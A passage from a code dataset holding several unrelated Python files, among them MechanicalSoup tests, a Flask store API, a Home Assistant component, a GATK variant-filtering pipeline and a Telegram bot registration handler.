os.getcwd()\n\t\tself.setGeometry(0,0,800,600)\n\t\turl = QUrl.fromLocalFile(\"{}/index.html\".format(self.cwd))\n\t\tself.load(url)","sub_path":"server/server/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"387438305","text":"class Frequency:\n def __init__(self, arr, item):\n self.arr = arr\n self.item = item\n\n def get_frequency(self):\n count = 0\n\n if item not in arr:\n return count\n else:\n for i in self.arr:\n if i == self.item:\n count += 1\n\n return count\n\nif __name__ == \"__main__\":\n arr = [x for x in input(\"Enter array elements space seperated\").split()]\n item = input(\"Enter the item whose frequency you want to know\")\n\n f1 = Frequency(arr, item)\n print(f1.get_frequency())\n","sub_path":"phase1/freqArrayEle.py","file_name":"freqArrayEle.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"562268404","text":"import mechanicalsoup\nimport sys\nimport re\nfrom bs4 import BeautifulSoup\nfrom test_form import setup_mock_browser\nimport pytest\n\ndef test_submit_online():\n \"\"\"Complete and submit the pizza form at http://httpbin.org/forms/post \"\"\"\n browser = mechanicalsoup.StatefulBrowser()\n browser.set_user_agent('testing https://github.com/hickford/MechanicalSoup')\n browser.open(\"http://httpbin.org/\")\n for link in browser.links():\n if link[\"href\"] == \"/\":\n browser.follow_link(link)\n break\n browser.follow_link(\"forms/post\")\n assert browser.get_url() == \"http://httpbin.org/forms/post\"\n browser.select_form(\"form\")\n browser[\"custname\"] = \"Customer Name Here\"\n browser[\"size\"] = \"medium\"\n browser[\"topping\"] = (\"cheese\")\n browser[\"comments\"] = \"Some comment here\"\n browser.get_current_form().set(\"nosuchfield\", \"new value\", True)\n response = browser.submit_selected()\n json = response.json()\n data = json[\"form\"]\n assert data[\"custname\"] == \"Customer Name Here\"\n assert data[\"custtel\"] == \"\" # web browser submits \"\" for input left blank\n assert data[\"size\"] == \"medium\"\n assert data[\"topping\"] == \"cheese\"\n assert data[\"comments\"] == \"Some comment here\"\n assert data[\"nosuchfield\"] == \"new value\"\n\n assert (json[\"headers\"][\"User-Agent\"] ==\n 'testing https://github.com/hickford/MechanicalSoup')\n # Ensure we haven't blown away any regular headers\n assert set(('Content-Length', 'Host', 'Content-Type', 'Connection', 'Accept',\n 'User-Agent', 'Accept-Encoding')).issubset(json[\"headers\"].keys())\n\n\ndef test_no_404():\n browser = mechanicalsoup.StatefulBrowser()\n resp = browser.open(\"http://httpbin.org/nosuchpage\")\n assert resp.status_code == 404\n\ndef test_404():\n browser = mechanicalsoup.StatefulBrowser(raise_on_404=True)\n with pytest.raises(mechanicalsoup.LinkNotFoundError) as context:\n resp = browser.open(\"http://httpbin.org/nosuchpage\")\n resp = browser.open(\"http://httpbin.org/\")\n assert resp.status_code == 200\n\ndef test_user_agent():\n browser = mechanicalsoup.StatefulBrowser(user_agent='007')\n resp = browser.open(\"http://httpbin.org/user-agent\")\n assert resp.json() == {'user-agent': '007'}\n\ndef test_open_relative():\n # Open an arbitrary httpbin page to set the current URL\n browser = mechanicalsoup.StatefulBrowser()\n browser.open(\"http://httpbin.org/html\")\n\n # Open a relative page and make sure remote host and browser agree on URL\n resp = browser.open_relative(\"/get\")\n assert resp.json()['url'] == \"http://httpbin.org/get\"\n assert browser.get_url() == \"http://httpbin.org/get\"\n\n # Test passing additional kwargs to the session\n resp = browser.open_relative(\"/basic-auth/me/123\", auth=('me', '123'))\n assert browser.get_url() == \"http://httpbin.org/basic-auth/me/123\"\n assert resp.json() == {\"authenticated\": True, \"user\": \"me\"}\n\ndef test_links():\n browser = mechanicalsoup.StatefulBrowser()\n html = '''A Blue Link\n A Red Link'''\n expected = [BeautifulSoup(html).a]\n browser.open_fake_page(html)\n\n # Test StatefulBrowser.links url_regex argument\n assert browser.links(url_regex=\"bl\") == expected\n assert browser.links(url_regex=\"bluish\") == []\n\n # Test StatefulBrowser.links link_text argument\n assert browser.links(link_text=\"A Blue Link\") == expected\n assert browser.links(link_text=\"Blue\") == []\n\n # Test StatefulBrowser.links kwargs passed to BeautifulSoup.find_all\n assert browser.links(string=re.compile('Blue')) == expected\n assert browser.links(class_=\"bluelink\") == expected\n assert browser.links(id=\"blue_link\") == expected\n assert browser.links(id=\"blue\") == []\n\n # Test returning a non-singleton\n two_links = browser.links(id=re.compile('_link'))\n assert len(two_links) == 2\n assert two_links == BeautifulSoup(html).find_all('a')\n\n@pytest.mark.parametrize(\"expected_post\", [\n pytest.param(\n [\n ('comment', 'Selecting an input submit'),\n ('diff', 'Review Changes'),\n ('text', 'Setting some text!')\n ], id='input'),\n pytest.param(\n [\n ('comment', 'Selecting a button submit'),\n ('cancel', 'Cancel'),\n ('text', '= Heading =\\n\\nNew page here!\\n')\n ], id='button'),\n])\ndef test_submit_btnName(expected_post):\n '''Tests that the btnName argument chooses the submit button.'''\n browser, url = setup_mock_browser(expected_post=expected_post)\n browser.open(url)\n form = browser.select_form('#choose-submit-form')\n browser['text'] = expected_post[2][1]\n browser['comment'] = expected_post[0][1]\n res = browser.submit_selected(btnName = expected_post[1][0])\n assert(res.status_code == 200 and res.text == 'Success!')\n\ndef test_get_set_debug():\n browser = mechanicalsoup.StatefulBrowser()\n # Debug mode is off by default\n assert(not browser.get_debug())\n browser.set_debug(True)\n assert(browser.get_debug())\n\ndef test_list_links(capsys):\n # capsys is a pytest fixture that allows us to inspect the std{err,out}\n browser = mechanicalsoup.StatefulBrowser()\n links = '''\n Link #1\n Link #2\n'''\n browser.open_fake_page('{0}'.format(links))\n browser.list_links()\n out, err = capsys.readouterr()\n expected = 'Links in the current page:{0}'.format(links)\n assert out == expected\n\nif __name__ == '__main__':\n pytest.main(sys.argv)\n","sub_path":"tests/test_stateful_browser.py","file_name":"test_stateful_browser.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"564592001","text":"import torch\nfrom torchvision import models\nfrom torchvision import transforms\nfrom PIL import Image\n\n\nclass MyResnet():\n def __init__(self, model_state_path: str, classes_names_path: str):\n # load the model\n self._model = models.resnet101(pretrained=False)\n state_dict = torch.load(model_state_path)\n self._model.load_state_dict(state_dict)\n # put the network in eval mode\n self._model.eval()\n # create an image transform\n self.transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n )])\n # load names of all classes\n with open(classes_names_path) as f:\n self.classes = [line.strip() for line in f.readlines()]\n\n def predict(self, img: Image):\n img_t = self.transform(img)\n batch_t = torch.unsqueeze(img_t, 0)\n\n # carry out model inference\n out = self._model(batch_t)\n\n _, index = torch.max(out, 1)\n percentage = torch.nn.functional.softmax(out, dim=1)[0] * 100\n return self.classes[index[0]], percentage[index[0]].item()\n\n# # Forth, print the top 5 classes predicted by the model\n# _, indices = torch.sort(out, descending=True)\n# percentage = torch.nn.functional.softmax(out, dim=1)[0] * 100\n# print([(classes[idx], percentage[idx].item()) for idx in indices[0][:5]])\n","sub_path":"v4-docker-w-minio/model/myresnet.py","file_name":"myresnet.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88763701","text":"from abc import ABC, abstractmethod\r\nfrom typing import List\r\nfrom typing import Optional\r\nfrom copy import deepcopy\r\nimport re\r\n\r\n\r\nclass Product:\r\n def __init__(self, name: str, price: float):\r\n self.name = name\r\n self.price = price\r\n\r\n def __hash__(self):\r\n return hash((self.name, self.price))\r\n\r\n def __eq__(self, other):\r\n return self.name == other.name and self.price == other.price\r\n\r\n\r\nclass Server(ABC):\r\n n_max_returned_entries = 3\r\n\r\n @abstractmethod\r\n def __init__(self):\r\n super().__init__()\r\n\r\n @abstractmethod\r\n def get_entries(self, n_letters: Optional[int]) -> List[Product]:\r\n pass\r\n\r\n\r\nclass ListServer(Server):\r\n\r\n def __init__(self, productlist: List[Product]):\r\n super().__init__()\r\n self.products = deepcopy(productlist)\r\n\r\n def get_entries(self, n_letters: Optional[int] = None) -> List[Product]:\r\n if n_letters is None:\r\n n_letters = 1\r\n\r\n new_list = []\r\n\r\n for el in self.products:\r\n if re.match('^[a-zA-Z]{{{n}}}\\\\d{{2,3}}$'.format(n=n_letters), el.name):\r\n new_list.append(el)\r\n\r\n if len(new_list) <= self.n_max_returned_entries:\r\n second_list = sorted(new_list, key=lambda el: el.price)\r\n return second_list\r\n else:\r\n raise TooManyProductsFoundError\r\n\r\n\r\nclass MapServer(Server):\r\n def __init__(self, productlist: List[Product]):\r\n super().__init__()\r\n productdict = dict()\r\n for el in productlist:\r\n productdict[el.name] = el\r\n self.products = deepcopy(productdict)\r\n\r\n def get_entries(self, n_letters: Optional[int] = None) -> List[Product]:\r\n if n_letters is None:\r\n n_letters = 1\r\n\r\n new_list = []\r\n\r\n for el in self.products.values():\r\n if re.match('^[a-zA-Z]{{{n}}}\\\\d{{2,3}}$'.format(n=n_letters), el.name):\r\n new_list.append(el)\r\n\r\n if len(new_list) <= self.n_max_returned_entries:\r\n second_list = sorted(new_list, key=lambda el: el.price)\r\n return second_list\r\n else:\r\n raise TooManyProductsFoundError\r\n\r\n\r\nclass Client:\r\n\r\n def __init__(self, city_centre: Server):\r\n self.city_server = city_centre\r\n\r\n def get_total_price(self, n_letters: Optional[int]) -> Optional[float]:\r\n try:\r\n sum = 0\r\n koszyk = self.city_server.get_entries(n_letters)\r\n if len(koszyk) == 0:\r\n return None\r\n for el in koszyk:\r\n sum = sum + el.price\r\n return sum\r\n except TooManyProductsFoundError:\r\n return None\r\n\r\n\r\nclass ServerError(Exception):\r\n pass\r\n\r\n\r\nclass TooManyProductsFoundError(ServerError):\r\n pass\r\n\r\n","sub_path":"servers.py","file_name":"servers.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"354689762","text":"\n\ndata = [ ('A', 'D', 24),\n ('B', 'D', 24),\n ('C', 'H', 192),\n ('D', 'H', 160),\n ('E', 'H', 94),]\n\nfor item in data:\n gubun = item[1]\n amount = item[2]\n salary = 0\n if gubun == 'D':\n salary = amount * 8 * 7560\n else:\n salary = amount * 7560\n\n print(item[0], salary)","sub_path":"calc_salary.py","file_name":"calc_salary.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138184089","text":"# 引入记录日志的库\nimport logging\nimport voluptuous as vol\nimport homeassistant.helpers.config_validation as cv\nfrom datetime import timedelta\n# track_time_interval是监听时间变化事件的一个函数\nfrom homeassistant.helpers.event import track_time_interval\n \nDOMAIN = \"hello_world\"\nENTITYID = DOMAIN + \".hello_world\"\n\n\n# 预定义配置文件中的key值\nCONF_NAME_TOBE_DISPLAYED = \"name_tobe_displayed\"\nCONF_SLOGON = \"slogon\"\n\n# 预定义缺省的配置值\nDEFAULT_SLOGON = \"积木构建智慧空间!\"\n\nCONF_STEP = \"step\"\nDEFAULT_STEP = 3\n\n# 定义时间间隔为3秒钟\nTIME_BETWEEN_UPDATES = timedelta(seconds=3)\n \n# 在python中,__name__代表模块名字\n_LOGGER = logging.getLogger(__name__)\n\n# 配置文件的样式\nCONFIG_SCHEMA = vol.Schema(\n {\n DOMAIN: vol.Schema(\n {\n # “name_tobe_displayed”在配置文件中是必须存在的(Required),否则报错,它的类型是字符串\n vol.Required(CONF_NAME_TOBE_DISPLAYED): cv.string,\n # “slogon”在配置文件中可以没有(Optional),如果没有缺省值为“积木构建智慧空间!”,它的类型是字符串\n vol.Optional(CONF_SLOGON, default=DEFAULT_SLOGON): cv.string,\n vol.Optional(CONF_STEP,default=DEFAULT_STEP): cv.positive_int,\n }),\n },\n extra=vol.ALLOW_EXTRA)\n\n\n \ndef setup(hass, config):\n\n \"\"\"配置文件加载后,setup被系统调用.\"\"\"\n # config[DOMAIN]代表这个域下的配置信息\n conf = config[DOMAIN]\n # 获得具体配置项信息\n friendly_name = conf.get(CONF_NAME_TOBE_DISPLAYED)\n slogon = conf.get(CONF_SLOGON)\n step = conf.get(CONF_STEP)\n\n _LOGGER.info(\"Get the configuration %s=%s; %s=%s\",\n CONF_NAME_TOBE_DISPLAYED, friendly_name,\n CONF_SLOGON, slogon)\n\n # 根据配置内容设置属性值\n attr = {\"icon\": \"mdi:yin-yang\",\n \"friendly_name\": friendly_name,\n \"slogon\": slogon,\n \"unit_of_measurement\": \"steps\"\n }\n hass.states.set(ENTITYID, '太棒了', attributes=attr)\n\n \n def change_state(call):\n \"\"\"change_state函数切换改变实体的状态.\"\"\"\n # 记录info级别的日志\n _LOGGER.info(\"hachina's change_state service is called.\")\n \n # 切换改变状态值\n if hass.states.get(ENTITYID).state == '太棒了':\n hass.states.set(ENTITYID, '真好', attributes=attr)\n else:\n hass.states.set(ENTITYID, '太棒了', attributes=attr)\n \n # 注册服务hachina.change_state\n hass.services.register(DOMAIN, 'change_state', change_state)\n \n\n\n # 构建类GrowingState\n GrowingState(hass, step, attr)\n\n return True\n\n\nclass GrowingState(object):\n \"\"\"定义一个类,此类中存储了状态与属性值,并定时更新状���.\"\"\"\n \n def __init__(self, hass, step, attr):\n \"\"\"GrwoingState类的初始化函数,参数为hass、step和attr.\"\"\"\n # 定义类中的一些数据\n self._hass = hass\n self._step = step\n self._attr = attr\n self._state = 0\n \n # 在类初始化的时候,设置初始状态\n self._hass.states.set(ENTITYID, self._state, attributes=self._attr)\n \n # 每隔一段时间,更新一下实体的状态\n track_time_interval(self._hass, self.update, TIME_BETWEEN_UPDATES)\n \n def update(self, now):\n \"\"\"在GrowingState类中定义函数update,更新状态.\"\"\"\n _LOGGER.info(\"GrowingState is updating…\")\n \n # 状态值每次增加step\n self._state = self._state + self._step\n \n # 设置新的状态值\n self._hass.states.set(ENTITYID, self._state, attributes=self._attr)\n","sub_path":"custom_components/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415059083","text":"from django.shortcuts import render\nfrom django.views.generic.base import TemplateView\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, Http404, HttpResponseRedirect\nfrom product.models import Category\nfrom blog.models import Post, Subscriber\n# Create your views here.\n\nclass HomePageView(TemplateView):\n\n template_name = \"home.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"categories\"] = Category.objects.all() \n context[\"posts\"] = Post.objects.filter(public=True).order_by('-created_at')[:3]\n return context\n\n\n@csrf_exempt\ndef subscribe_view(request):\n if request.method == \"POST\" and request.is_ajax():\n\n email = request.POST.get('email', None)\n if email:\n subscriber = Subscriber.objects.filter(email=email)\n \n if not subscriber.exists():\n Subscriber.objects.create(email=email)\n \n elif Subscriber.objects.get(email=email).active == False:\n Subscriber.objects.filter(email=email).update(active = True) \n\n data = { 'registered': True }\n \n return JsonResponse(data)\n raise Http404(\"Página não encontrada.\")","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254247483","text":"from flask import Flask,jsonify,request\r\n\r\napp=Flask(__name__)\r\n\r\nstores=[\r\n{\r\n \"name\":\"ram\",\r\n \"items\":[{\r\n \"name\":\"item\",\r\n \"price\":12\r\n }]\r\n}\r\n]\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n\treturn \"hello\"\r\n\r\n@app.route(\"/store\")\r\ndef get_stores():\r\n\treturn jsonify({'stores': stores})\r\n\r\n@app.route('/store',methods=['POST'])\r\ndef create_store():\r\n request_data=request.get_json()\r\n new_store={\r\n \"name\":request_data[\"name\"],\r\n \"items\":[]\r\n }\r\n stores.append(new_store)\r\n return jsonify({'stores': stores})\r\n\r\n\r\n\r\n@app.route(\"/store/\", methods=['DELETE'])\r\ndef delete_store(name):\r\n\tfor store in stores:\r\n\t\tif store[\"name\"]==name:\r\n\t\t\tdel store\r\n\t\t\treturn \"done\"\r\n\treturn \"error\"\r\n\r\n@app.route(\"/store/\", methods=['PUT'])\r\ndef put_store(name):\r\n\trequest_data=request.get_json()\r\n\tfor store in stores:\r\n\t\tif store[\"name\"]==name:\r\n\t\t\tstore.update({\"name\":request_data[\"name\"]})\r\n\t\t\treturn \"done\"\r\n\treturn \"Error\"\r\n\r\n\r\n\t\r\n\r\n\r\napp.run(port=5000)","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613840184","text":"#Alan Pittman & Dionysios Grigoriadis\r\n\r\n#Program to genotype gVCF files in batches to join later for cohort (exome-wide studies etc.)\r\n\r\n#Step_by_step:\r\n#1)Combine gVCF files into a joint gVCF file,\r\n#2)Genotype joint gVCF file\r\n\r\n#Version 1.1\r\n# - Written in Python instead of bash\r\n# - Log files will be written in the output directories\r\n#################################################################################################################\r\nimport os\r\nimport sys\r\nimport subprocess\r\nimport csv\r\nfrom optparse import OptionParser\r\n\r\n#OUR RESOURCES:\r\nfrom dependencies import *\r\nfrom utils import *\r\n\r\n#USER INPUT\r\nparser = OptionParser()\r\nparser.add_option(\"-p\", \"--Project_name\", dest=\"projectname\",\r\n\t\t\t\t help=\"The suffix of the joint vcf you want to filter\")\r\n#parser.add_option(\"-o\", \"--output\", dest=\"output\",\r\n#\t\t\t\t help=\"suffix of the result files (e.g. comb for ./comb.g.vcf.gz\")\r\n\r\n(options, args) = parser.parse_args()\r\n\r\npname = options.projectname\r\n#gname = options.glocname\r\n#output = options.output\r\n\r\n\r\n#pname='postergaard_athos_and_25032019'\r\npname = pname.strip()\r\n\r\n##############################################################\r\n#Set-up working and output directories\r\ndirpath = os.getcwd()\r\ntemp_dir = dirpath+\"/tmp/\"+pname+\"/\"\r\ncohort_dir = dirpath+\"/Filtered_Joint_called_VCFs/\"\r\nout_dir = cohort_dir + pname + \"/\"\r\nvfilt_output = temp_dir+pname+\"_HF.vcf\"\r\nvrecal1_output = temp_dir+pname+\"_SNP.recal\"\r\nvsqr_output = temp_dir+pname+\"_HF_SNP.recal.snps.vcf\"\r\nvrecal2_output = temp_dir+pname+\"_INDEL.recal\"\r\nvsqr_final_output = out_dir+pname+\"_HF4_SNP.recal.snps.indel.vcf\"\r\nvsqr_final_annotated_output = out_dir+pname+\"_HF4_SNP.recal.snps.indel.dbSNP.vcf\"\r\n\r\n\r\nif not os.path.exists(temp_dir):\r\n os.makedirs(temp_dir)\r\n\r\n\r\nif not os.path.exists(cohort_dir):\r\n os.makedirs(cohort_dir)\r\n\r\n\r\n\r\nif not os.path.exists(out_dir):\r\n os.makedirs(out_dir)\r\n\r\n##############################################################\r\n##############################################################\r\n##RUNNING THE COMMANDS\r\n#Variant Filtration\r\nprint(\"\\n\")\r\nprint(\"VariantFiltration\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantFiltration -R '+BWAindex+\" -V \"+temp_dir+pname+\".vcf \"+'--genotype-filter-expression \"DP < 6\" ' \\\r\n '--genotype-filter-name \"LowDepth\" --genotype-filter-expression \"GQ < 20.0 && GQ > 0.0\" --genotype-filter-name \"LowGQ\" -O '+vfilt_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'VariantFiltration.log') #n=2\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#os.remove(temp_dir+'temp_vars.txt')\r\n\r\n#VariantRecalibrator\r\nprint(\"\\n\")\r\nprint(\"VariantRecalibrator\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantRecalibrator -R '+BWAindex+\" -V \"+vfilt_output+\" -tranche 100.0 -tranche 99.9 -tranche 99.5 \" \\\r\n \"-tranche 99.0 -tranche 90.0 -mode SNP --tranches-file \"+temp_dir+pname+\"_SNP.tranches --rscript-file \"+temp_dir+pname+\".plots.R \" \\\r\n \"--resource hapmap,known=false,training=true,truth=true,prior=15.0:\"+hapmap+\" --resource omni,known=false,training=true,truth=true,\" \\\r\n \"prior=12.0:\"+omni+\" --resource 1000G,known=false,training=true,truth=false,prior=10.0:\"+G1000+\" --resource dbsnp,known=true,training=\" \\\r\n \"false,truth=false,prior=2.0:\"+dbsnp+\" -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR --output \"+vrecal1_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'VariantRecalibrator.log') #n=2\r\n\r\n#os.remove(gvcf_output)\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#ApplyVQSR\r\nprint(\"\\n\")\r\nprint(\"ApplyVQSR\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' ApplyVQSR -R '+BWAindex+\" -mode SNP --truth-sensitivity-filter-level 99.5 -V \"+vfilt_output+\" \" \\\r\n \"--tranches-file \"+temp_dir+pname+\"_SNP.tranches --recal-file \"+vrecal1_output+\" -O \"+vsqr_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'ApplyVQSR.log') #n=2\r\n\r\n#os.remove(gvcf_output)\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#VariantRecalibrator INDELS\r\nprint(\"\\n\")\r\nprint(\"VariantRecalibrator INDELS\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantRecalibrator -R '+BWAindex+\" -V \"+vfilt_output+\" -tranche 100.0 -tranche 99.9 -tranche 99.5 \" \\\r\n \"-tranche 99.0 -tranche 90.0 -mode INDEL --tranches-file \"+temp_dir+pname+\"_INDEL.tranches --rscript-file \"+temp_dir+pname+\"_INDEL.plots.R \" \\\r\n \"--resource mills,known=false,training=true,truth=true,prior=12.0:\"+mills+\" --resource dbsnp,known=true,training=\" \\\r\n \"false,truth=false,prior=2.0:\"+dbsnp+\" -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR --output \"+vrecal2_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'VariantRecalibrator_INDEL.log') #n=2\r\n\r\n#os.remove(gvcf_output)\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#ApplyVQSR INDELS\r\nprint(\"\\n\")\r\nprint(\"ApplyVQSR INDELS\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' ApplyVQSR -R '+BWAindex+\" -mode INDEL --truth-sensitivity-filter-level 98.0 -V \"+vsqr_output+\" \" \\\r\n \"--tranches-file \"+temp_dir+pname+\"_INDEL.tranches --recal-file \"+vrecal2_output+\" -O \"+vsqr_final_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'ApplyVQSR_INDEL.log') #n=2\r\n\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#VariantAnnotator\r\nprint(\"\\n\")\r\nprint(\"Variant Annotator\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantAnnotator -R '+BWAindex+\" -V \"+vsqr_final_output+\" \" \\\r\n \"--dbsnp \"+refknownsitesSNPS+\" -O \"+vsqr_final_annotated_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'variantannotator.log') #n=2\r\n\r\nprint(comm)\r\nprint(\"\\n\")","sub_path":"pipeline_filter_vqsr_jointvcf_v1.1.py","file_name":"pipeline_filter_vqsr_jointvcf_v1.1.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456298576","text":"import pymongo\nfrom pymongo import MongoClient\nimport re\nimport requests\nimport json\nfrom const import *\n\nmongo_client = MongoClient()\nmongo_db = mongo_client.darth\ncollection_users = mongo_db.users\ncollection_users_twin = mongo_db.users_twin\ncollection_stats = mongo_db.users_stats\n\n# mongo_db.users\n# {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': swgoh_name}\n\n# mongo_db.users_twin\n# {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': swgoh_name}\n\ndef handler_reg(bot,message,my_logger):\n\n\ttry:\n\n\t\tRREG = False\n\t\tif (message.text.startswith('!rreg') or message.text.startswith('!ррег')) and message.from_user.id in ADMINS:\n\t\t\tRREG = True # админский бэкдор для форсированной регистрации !rreg tgusername allycode nick name name name in game\n\n\t\tmsg = \"\"\n\t\tally_code = False\n\t\ttelega_username = False\n\t\ttele_id = None\n\n\t\ts = message.text.split()\n\n\t\tif len(s) == 2:\n\t\t\t# передано только 1 параметр, предполагаем что это игрок регистрирует сам себя и указал ally code\n\t\t\tif message.from_user.username is not None: # у игрока установлен username в телеге\n\t\t\t\tif re.match(r\"(\\D*\\d){9}\", s[1]) and len(s[1]) == 9: # проверим что код = девятизначное число\n\t\t\t\t\tally_code = s[1]\n\t\t\t\t\ttelega_username = message.from_user.username\n\t\t\t\t\ttele_id = message.from_user.id\n\t\t\t\telse:\n\t\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, код союзника указан неверно (правильный формат - 123456789)')\n\t\t\t\t\tmy_logger.info(\"Ally code in wrong format\")\n\t\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tbot.reply_to(message,f\"Регистрация невозможна, у вас не задан username в телеграме! Задать можно в настройках приложения\")\n\t\t\t\tmy_logger.info(\"Username is None\")\n\t\t\t\treturn\n\n\t\t\t# на выходе имеем установленный ally_code и telega_username\n\n\t\telif len(s)==3:\n\t\t\t# в !reg передано два параметра\n\t\t\tif re.match(r\"(\\D*\\d){9}\", s[2]) and len(s[2]) == 9: # проверим что код = девятизначное число\n\t\t\t\tally_code = s[2]\n\t\t\t\ttelega_username = s[1].replace(\"@\",\"\")\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, код союзника указан неверно (правильный формат - 123456789)')\n\t\t\t\tmy_logger.info(\"Ally code in wrong format\")\n\t\t\t\treturn\n\n\t\t\t# на выходе имеем установленный ally_code и telega_username\n\n\t\telif len(s)>3 and RREG: # админ передал 4 параметра - !rreg tgusername allycode nick name name name in game\n\n\t\t\tif re.match(r\"(\\D*\\d){9}\", s[2]) and len(s[2]) == 9: # проверим что код = девятизначное число\n\t\t\t\tally_code = s[2]\n\t\t\t\ttelega_username = s[1].replace(\"@\",\"\")\n\t\t\t\tgame_nick = \"\"\n\t\t\t\tfor i in range(3,len(s)):\n\t\t\t\t\tgame_nick += f\"{s[i]} \"\n\t\t\t\tgame_nick = game_nick.rstrip()\n\t\t\t\tbot.reply_to(message, f'Попытка зарегистрировать {telega_username} с кодом {ally_code} и ником в игре \"{game_nick}\"')\n\n\t\telse:\n\t\t\tbot.reply_to(message, 'Регистрация невозможна! Корректное использование:\\n`!reg имяВТелеге кодСоюзника` или `!reg кодСоюзника` для регистрации себя', parse_mode=\"Markdown\")\n\t\t\tmy_logger.info(\"Registration not possible, wrong command format\")\n\n\n\t\t# далее исполняется только если код союзника = девятизначное число в ally_code, а также установлен telega_username\n\t\tif ally_code and telega_username:\n\t\t\t\n\t\t\tif not RREG: # получим данные из swgoh.gg\n\t\t\t\tr = requests.get(f'{SWGOH_URL}/{ally_code}')\n\t\t\t\tjdata = r.json()\n\t\t\t\tif jdata:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, указанный код союзника не найден на https://swgoh.gg/p/{ally_code}/')\n\t\t\t\t\tmy_logger.info(\"Ally code not found\")\n\t\t\t\t\treturn\n\t\t\t\tplayer_name = jdata['data']['name']\n\t\t\telif game_nick is not None: # это запрос на регистрацию от админа с указанным game_nick, который уже должен быть заполнен\n\t\t\t\tplayer_name = game_nick\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, указанный код союзника не найден на https://swgoh.gg/p/{ally_code}/')\n\t\t\t\tmy_logger.info(\"Ally code not found\")\n\t\t\t\treturn\n\n\t\t\t# теперь так же имеем player_name\n\n\t\t\t# проверим, может игрок уже зарегистрирован\n\t\t\tfound_user = collection_users.find_one({'user': telega_username})\n\t\t\tif found_user: # действительно, уже \n\t\t\t\tmsg = f'Пользователь {telega_username} уже зарегистрирован! '\n\t\t\t\tmsg += f'Если нужно изменить информацию - сначала надо удалить пользователя через команду `!forget {telega_username}`'\n\t\t\t\tbot.send_message(message.chat.id, msg, parse_mode=\"Markdown\")\n\t\t\t\tmy_logger.info(\"User already exists, forget first\")\n\t\t\telse: # регистрируем нового пользователя\n\t\t\t\tnew_user = {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': player_name}\n\t\t\t\tif tele_id is not None:\n\t\t\t\t\tnew_user['tele_id'] = tele_id\n\t\t\t\tcollection_users.insert_one(new_user)\n\t\t\t\tbot.send_message(message.chat.id, f'Пользователь {telega_username} успешно зарегистрирован! Найденное имя в SWGOH: {player_name}')\n\t\t\t\tmy_logger.info(f\"Registration successful! Found SWGOH name {player_name}\")\n\n\texcept Exception as e:\n\n\t\tbot.reply_to(message, \"Произошла ошибка, попробуйте позже!\")\n\t\tmy_logger.info(f\"Something went wrong during !reg: {e}\")\n\n\n\n\ndef handler_twin_reg(bot,message,my_logger):\n\n\t# бэкдор для регистрации двойника, доступен только админам\n\n\ttry:\n\n\t\tally_code = False\n\t\ttelega_username = False\n\n\t\ts = message.text.split()\n\n\t\tif len(s)>3: # должно быть передано не менее 4 параметров, последний из которых - имя в игре: !twinreg tgusername allycode nick name name name in game\n\n\t\t\tif re.match(r\"(\\D*\\d){9}\", s[2]) and len(s[2]) == 9: # проверим что код = девятизначное число\n\t\t\t\tally_code = s[2]\n\t\t\t\ttelega_username = 